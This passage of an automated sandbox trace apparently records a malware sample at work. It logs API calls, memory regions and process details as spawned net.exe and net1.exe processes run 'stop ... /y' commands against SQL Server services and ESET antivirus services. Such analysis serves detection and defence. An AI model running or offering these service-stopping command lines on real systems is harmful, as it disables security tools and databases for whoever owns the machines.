returned -7 [0122.984] _wcsicmp (_String1="server", _String2="SQLAGENT$PROD") returned -12 [0122.984] _wcsicmp (_String1="svr", _String2="SQLAGENT$PROD") returned 5 [0122.984] _wcsicmp (_String1="srv", _String2="SQLAGENT$PROD") returned 1 [0122.984] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$PROD") returned -7 [0122.984] _wcsicmp (_String1="alerter", _String2="SQLAGENT$PROD") returned -18 [0122.984] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$PROD") returned -5 [0122.984] NetServiceControl (in: servername=0x0, service="SQLAGENT$PROD", opcode=0x0, arg=0x0, bufptr=0x28f8b0 | out: bufptr=0x28f8b0) returned 0x889 [0123.001] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.001] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0123.001] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.003] GetFileType (hFile=0xb) returned 0x2 [0123.004] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f778 | out: lpMode=0x28f778) returned 1 [0123.012] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28f770, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x28f770*=0x1e) returned 1 [0123.015] GetFileType (hFile=0xb) returned 0x2 [0123.015] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f778 | out: lpMode=0x28f778) returned 1 [0123.020] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f770, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x28f770*=0x2) returned 1 [0123.020] _ultow (in: _Dest=0x889, _Radix=2684896 | out: _Dest=0x889) returned="2185" [0123.020] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0123.020] GetFileType (hFile=0xb) returned 0x2 [0123.021] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f778 | out: lpMode=0x28f778) returned 1 [0123.022] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28f770, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x28f770*=0x34) returned 1 [0123.022] GetFileType (hFile=0xb) returned 0x2 [0123.023] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f778 | out: lpMode=0x28f778) returned 1 [0123.024] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f770, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x28f770*=0x2) returned 1 [0123.025] NetApiBufferFree (Buffer=0x3e4d50) returned 0x0 [0123.025] NetApiBufferFree (Buffer=0x3ec100) returned 0x0 [0123.025] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PROD /y " [0123.025] exit (_Code=2) Process: id = "387" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x64c57000" os_pid = "0x1360" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "381" os_parent_pid = "0xea0" cmd_line = "C:\\Windows\\system32\\net1 stop msftesql$PROD /y " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13429 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13430 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13431 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13432 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 13433 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13434 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13435 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13436 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13437 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13438 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13439 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 13440 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13651 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13652 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13653 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 13654 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13655 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13656 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13657 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13698 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13699 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 13700 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 13701 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13702 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13703 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13704 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13705 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13706 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13707 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13708 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13709 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13710 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13711 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13712 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13713 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13714 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13715 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13716 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13777 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 938 os_tid = 0xadc [0122.946] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fef0 | out: lpSystemTimeAsFileTime=0x26fef0*(dwLowDateTime=0xfe685170, dwHighDateTime=0x1d48689)) [0122.946] GetCurrentProcessId () returned 0x1360 [0122.947] GetCurrentThreadId () returned 0xadc [0122.947] GetTickCount () returned 0x285e1 [0122.947] QueryPerformanceCounter (in: lpPerformanceCount=0x26fef8 | out: lpPerformanceCount=0x26fef8*=1816986500000) returned 1 [0122.947] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0122.947] __set_app_type (_Type=0x1) [0122.947] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0122.947] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0122.948] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.948] GetConsoleOutputCP () returned 0x1b5 [0122.948] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0122.948] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.949] sprintf_s (in: _DstBuf=0x26fe98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0122.950] setlocale (category=0, locale=".437") returned="English_United States.437" [0122.951] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0122.951] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0122.951] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop msftesql$PROD /y " [0122.951] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fc30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0122.951] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0122.951] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fe88 | out: Buffer=0x26fe88*=0x3f4d50) returned 0x0 [0122.951] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fe88 | out: Buffer=0x26fe88*=0x3fc100) returned 0x0 [0122.951] _fileno (_File=0x7fefdba2a80) returned 0 [0122.951] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0122.951] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0122.951] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0122.951] _wcsicmp (_String1="config", _String2="stop") returned -16 [0122.951] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0122.951] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0122.951] _wcsicmp (_String1="file", _String2="stop") returned -13 [0122.952] _wcsicmp (_String1="files", _String2="stop") returned -13 [0122.952] _wcsicmp (_String1="group", _String2="stop") returned -12 [0122.952] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0122.952] _wcsicmp (_String1="help", _String2="stop") returned -11 [0122.952] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0122.952] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0122.952] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0122.952] _wcsicmp (_String1="session", _String2="stop") returned -15 [0122.952] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0122.952] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0122.952] _wcsicmp (_String1="share", _String2="stop") returned -12 [0122.952] _wcsicmp (_String1="start", _String2="stop") returned -14 [0122.952] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0122.952] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0122.952] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0122.952] _wcsicmp (_String1="accounts", _String2="msftesql$PROD") returned -12 [0122.952] _wcsicmp (_String1="computer", _String2="msftesql$PROD") returned -10 [0122.952] _wcsicmp (_String1="config", _String2="msftesql$PROD") returned -10 [0122.952] _wcsicmp (_String1="continue", _String2="msftesql$PROD") returned -10 [0122.952] _wcsicmp (_String1="cont", _String2="msftesql$PROD") returned -10 [0122.952] _wcsicmp (_String1="file", _String2="msftesql$PROD") returned -7 [0122.952] _wcsicmp (_String1="files", _String2="msftesql$PROD") returned -7 [0122.952] _wcsicmp (_String1="group", _String2="msftesql$PROD") returned -6 [0122.952] _wcsicmp (_String1="groups", _String2="msftesql$PROD") returned -6 [0122.952] _wcsicmp (_String1="help", _String2="msftesql$PROD") returned -5 [0122.952] _wcsicmp (_String1="helpmsg", _String2="msftesql$PROD") returned -5 [0122.952] _wcsicmp (_String1="localgroup", _String2="msftesql$PROD") returned -1 [0122.952] _wcsicmp (_String1="pause", _String2="msftesql$PROD") returned 3 [0122.952] _wcsicmp (_String1="session", _String2="msftesql$PROD") returned 6 [0122.952] _wcsicmp (_String1="sessions", _String2="msftesql$PROD") returned 6 [0122.952] _wcsicmp (_String1="sess", _String2="msftesql$PROD") returned 6 [0122.952] _wcsicmp (_String1="share", _String2="msftesql$PROD") returned 6 [0122.952] _wcsicmp (_String1="start", _String2="msftesql$PROD") returned 6 [0122.952] _wcsicmp (_String1="stats", _String2="msftesql$PROD") returned 6 [0122.952] _wcsicmp (_String1="statistics", _String2="msftesql$PROD") returned 6 [0122.952] _wcsicmp (_String1="stop", _String2="msftesql$PROD") returned 6 [0122.952] _wcsicmp (_String1="time", _String2="msftesql$PROD") returned 7 [0122.952] _wcsicmp (_String1="user", _String2="msftesql$PROD") returned 8 [0122.952] _wcsicmp (_String1="users", _String2="msftesql$PROD") returned 8 [0122.952] _wcsicmp (_String1="msg", _String2="msftesql$PROD") returned 1 [0122.952] _wcsicmp (_String1="messenger", _String2="msftesql$PROD") returned -14 [0122.952] _wcsicmp (_String1="receiver", _String2="msftesql$PROD") returned 5 [0122.953] _wcsicmp (_String1="rcv", _String2="msftesql$PROD") returned 5 [0122.953] _wcsicmp (_String1="netpopup", _String2="msftesql$PROD") returned 1 [0122.953] _wcsicmp (_String1="redirector", _String2="msftesql$PROD") returned 5 [0122.953] _wcsicmp (_String1="redir", _String2="msftesql$PROD") returned 5 [0122.953] _wcsicmp (_String1="rdr", _String2="msftesql$PROD") returned 5 [0122.953] _wcsicmp (_String1="workstation", _String2="msftesql$PROD") returned 10 [0122.953] _wcsicmp (_String1="work", _String2="msftesql$PROD") returned 10 [0122.953] _wcsicmp (_String1="wksta", _String2="msftesql$PROD") returned 10 [0122.953] _wcsicmp (_String1="prdr", _String2="msftesql$PROD") returned 3 [0122.953] _wcsicmp (_String1="devrdr", _String2="msftesql$PROD") returned -9 [0122.953] _wcsicmp (_String1="lanmanworkstation", _String2="msftesql$PROD") returned -1 [0122.953] _wcsicmp (_String1="server", _String2="msftesql$PROD") returned 6 [0122.953] _wcsicmp (_String1="svr", _String2="msftesql$PROD") returned 6 [0122.953] _wcsicmp (_String1="srv", _String2="msftesql$PROD") returned 6 [0122.953] _wcsicmp (_String1="lanmanserver", _String2="msftesql$PROD") returned -1 [0122.953] _wcsicmp (_String1="alerter", _String2="msftesql$PROD") returned -12 [0122.953] _wcsicmp (_String1="netlogon", _String2="msftesql$PROD") returned 1 [0122.953] _wcsupr (in: _String="msftesql$PROD" | out: _String="MSFTESQL$PROD") returned="MSFTESQL$PROD" [0122.953] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3fce10 [0123.035] GetServiceKeyNameW (in: hSCManager=0x3fce10, lpDisplayName="MSFTESQL$PROD", lpServiceName=0xffb35750, lpcchBuffer=0x26fda8 | out: lpServiceName="", lpcchBuffer=0x26fda8) returned 0 [0123.036] _wcsicmp (_String1="msg", _String2="MSFTESQL$PROD") returned 1 [0123.036] _wcsicmp (_String1="messenger", _String2="MSFTESQL$PROD") returned -14 [0123.036] _wcsicmp (_String1="receiver", _String2="MSFTESQL$PROD") returned 5 [0123.036] _wcsicmp (_String1="rcv", _String2="MSFTESQL$PROD") returned 5 [0123.036] _wcsicmp (_String1="redirector", _String2="MSFTESQL$PROD") returned 5 [0123.036] _wcsicmp (_String1="redir", _String2="MSFTESQL$PROD") returned 5 [0123.036] _wcsicmp (_String1="rdr", _String2="MSFTESQL$PROD") returned 5 [0123.036] _wcsicmp (_String1="workstation", _String2="MSFTESQL$PROD") returned 10 [0123.036] _wcsicmp (_String1="work", _String2="MSFTESQL$PROD") returned 10 [0123.036] _wcsicmp (_String1="wksta", _String2="MSFTESQL$PROD") returned 10 [0123.036] _wcsicmp (_String1="prdr", _String2="MSFTESQL$PROD") returned 3 [0123.036] _wcsicmp (_String1="devrdr", _String2="MSFTESQL$PROD") returned -9 [0123.036] _wcsicmp (_String1="lanmanworkstation", _String2="MSFTESQL$PROD") returned -1 [0123.036] _wcsicmp (_String1="server", _String2="MSFTESQL$PROD") returned 6 [0123.037] _wcsicmp (_String1="svr", _String2="MSFTESQL$PROD") returned 6 [0123.037] _wcsicmp (_String1="srv", _String2="MSFTESQL$PROD") returned 6 [0123.037] _wcsicmp (_String1="lanmanserver", _String2="MSFTESQL$PROD") returned -1 [0123.037] _wcsicmp (_String1="alerter", _String2="MSFTESQL$PROD") returned -12 [0123.037] _wcsicmp (_String1="netlogon", _String2="MSFTESQL$PROD") returned 1 [0123.037] NetServiceControl (in: servername=0x0, service="MSFTESQL$PROD", opcode=0x0, arg=0x0, bufptr=0x26fdb0 | out: bufptr=0x26fdb0) returned 0x889 [0123.037] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.037] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0123.038] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.040] GetFileType (hFile=0xb) returned 0x2 [0123.040] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fc78 | out: lpMode=0x26fc78) returned 1 [0123.040] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fc70, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x26fc70*=0x1e) returned 1 [0123.040] GetFileType (hFile=0xb) returned 0x2 [0123.040] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fc78 | out: lpMode=0x26fc78) returned 1 [0123.041] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fc70, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x26fc70*=0x2) returned 1 [0123.041] _ultow (in: _Dest=0x889, _Radix=2555104 | out: _Dest=0x889) returned="2185" [0123.041] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0123.041] GetFileType (hFile=0xb) returned 0x2 [0123.041] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fc78 | out: lpMode=0x26fc78) returned 1 [0123.041] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fc70, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x26fc70*=0x34) returned 1 [0123.042] GetFileType (hFile=0xb) returned 0x2 [0123.042] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fc78 | out: lpMode=0x26fc78) returned 1 [0123.042] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fc70, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x26fc70*=0x2) returned 1 [0123.042] NetApiBufferFree (Buffer=0x3f4d50) returned 0x0 [0123.042] NetApiBufferFree (Buffer=0x3fc100) returned 0x0 [0123.042] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop msftesql$PROD /y " [0123.042] exit (_Code=2) Process: id = "388" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1f4c8000" os_pid = "0x6b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ekrn /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13441 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13442 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13443 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13444 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 13445 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13446 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13447 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13448 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13449 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13450 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13451 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 13452 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13658 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13659 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13660 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 13661 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13662 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13663 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13664 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 939 os_tid = 0xc88 Process: id = "389" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x69ce8000" os_pid = "0x1390" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ESHASRV /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" 